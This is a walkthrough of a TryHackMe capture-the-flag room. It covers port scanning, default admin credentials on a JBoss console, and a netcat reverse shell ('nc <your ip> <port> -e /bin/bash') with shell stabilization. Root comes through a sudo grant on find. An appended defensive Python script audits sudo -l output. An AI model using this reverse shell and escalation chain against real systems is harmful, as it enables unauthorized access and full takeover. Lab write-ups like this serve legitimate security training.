Tony the tiger
May 5, 2021•342 words
Tony the Tiger - THM
nmap -sT 10.10.242.59 -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
The first flag, Tony's
The blog on port 80 holds the first flag. Take a look at the different posts there. If you find yourself poking around too much, stop looking at what meets the eye and go for stego. In the first post, you should download the picture and run strings against it. You should find your answer towards the bottom of the output.
The web server on 8080 shows there is an administration console. You should go there. A quick search on Google should tell you the default username and password for this kind of application (default credentials <application's name>). Once you have access to the console, poke around a little.
The second flag, JBoss
The exploit given with the room is easy to use. Run it with the -h flag to show the options. To obtain a shell, start a listener (nc -lvp <port>) and use it to run the command
nc <your ip> <port> -e /bin/bash
Stabilize the shell using
python3 -c "import pty; pty.spawn('/bin/bash')"
export TERM=xterm
Then background this shell (Ctrl+Z) and run (in your own shell)
stty raw -echo; fg
Poking around a little, I found that we can just walk into Jboss' home; there we find his flag.
The path to root is easy to FIND
Besides the flag, a useful note shows us the password for this account, so we can switch our current user to Jboss. After this, it's fairly straightforward. Jboss can run find as any other user on the system (run sudo -l to see for yourself). Check GTFOBins for a straight path to root. The flag is in /root, but with a twist: it's base64 encoded. Use a decoder (command line or an online tool), then paste the resulting hash into CrackStation (alternatively, save it to a file and run john against it).
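A defender-side check tied to the sudo finding above, added here and not part of the original write-up: it parses sudo -l output and flags entries that let a user run a shell-escape-capable binary such as find as root. The host name, the sample output and the second (harmless) entry are constructed to resemble what the room shows.

```python
"""Audit `sudo -l` output for entries that give a non-root user a path to root.

Added example for this write-up; the sample output below is constructed.
"""
import re

# Binaries whose documented features run arbitrary commands (find via -exec is
# the one this write-up relies on). Extend this set from your own hardening
# baseline; it is an assumption, not an exhaustive list.
SHELL_ESCAPE_BINARIES = {"find"}

# Matches the per-command lines of `sudo -l`, e.g. "(ALL) NOPASSWD: /usr/bin/find"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$"
)

# Constructed sample, shaped like the output described in the text.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jboss on tony:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/bin

User jboss may run the following commands on tony:
    (ALL) NOPASSWD: /usr/bin/find
    (www-data) /usr/bin/tail /var/log/apache2/access.log
"""


def parse_sudo_l(output: str) -> list[dict]:
    """Return one dict per allowed command: runas users, tags, command string."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # header / Defaults lines carry no command grants
        # "(user : group)" -> keep only the run-as user part, split on commas
        runas = [r.strip() for r in m.group("runas").split(":")[0].split(",")]
        tags = set(re.findall(r"[A-Z]+", m.group("tags")))
        for cmd in m.group("cmds").split(","):
            entries.append({"runas": runas, "tags": tags, "command": cmd.strip()})
    return entries


def audit(entries: list[dict]) -> list[dict]:
    """Flag grants that reach root through ALL or a shell-escape-capable binary."""
    findings = []
    for e in entries:
        binary = e["command"].split()[0].rsplit("/", 1)[-1]
        reaches_root = any(r in ("ALL", "root") for r in e["runas"])
        if reaches_root and (e["command"] == "ALL" or binary in SHELL_ESCAPE_BINARIES):
            reason = "NOPASSWD, no authentication needed" if "NOPASSWD" in e["tags"] else "password required"
            findings.append({**e, "reason": f"{binary} as root ({reason})"})
    return findings
```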